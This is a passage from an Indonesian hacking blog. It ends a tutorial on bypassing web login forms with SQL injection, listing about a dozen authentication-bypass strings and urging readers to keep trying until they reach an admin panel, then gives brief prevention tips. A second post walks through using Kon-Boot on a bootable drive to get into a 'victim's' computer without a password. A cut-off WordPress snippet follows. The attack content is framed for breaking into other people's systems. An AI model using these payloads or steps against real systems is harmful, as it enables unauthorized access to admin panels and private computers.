7) Banyak variasi kode yang mungkin, antara lain :
User name : admin
Password : ` or `a'='a
atau bisa dimasukkan ke dua–duanya misal :
‘ or 0=0 -- ; “ or 0=0 -- ; or 0=0 -- ; ‘ or 0=0 # ;
“ or 0=0 # ; ‘ or’x’=’x ; “ or “x”=”x ; ‘) or (‘x’=’x
 
Cobalah sampai berhasil hingga anda bisa masuk ke admin panel

Cara pencegahan SQL INJECTION
1) Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula akan bingung sejenak melihat input box nya gak bisa diinject dengan perintah yang panjang.
2) Filter input yang dimasukkan oleh user, terutama penggunaan tanda kutip tunggal (Input Validation).
3) Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan.
4) Matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures jika memungkinkan.
5) Ubah "Startup and run SQL Server" menggunakan low privilege user di SQL Server Security tab.
Mungkin Sekian darisaya fake-syst3m 
semoga bermanfaat

Special Thanks To All Member IndoSec

Monday, August 13, 2018

How to remove login screen on your Os

Haehae haee dah lama nih ga buat artikel:V

Kali ini we akan memberikan tutorial mengakses pc korban tanpa password

Lamgsung aja

Bahan
-Flashdisk/ MC/ DVD/ android / Dll
-File Kon-Boot
-Tumbal

Langkah²
-Download kon-boot(digugel banyak) :V
-buat alat bootable kon-boot(terserah mau pake FD/DVD/MC/driverdroid)
-pasang alat bootable di pc target
-setting untuk boot ke alat bootable
-lalu nyalakan pc target
-biarkan berjalan otomatis
-tunggu beberapa saat
-dan Voila, login screen sudah lenyap,lu bisa akses pc korban tanpa password
Layaknyaa Hacker Anonymous

Sekian Dari Saya Fake Syst3m
Ketemu Lagi Lain Waktu Yaa

Shootz:Putra Ar

Redirect ke POST jika hanya ada satu POST di Category maupun Tag WordPress

Tambahkan kode ini di bagian bawah file functions.php pada THEMES Anda. Kode ini akan mengarahkan secara otomatis ke URL POST / Artikel j...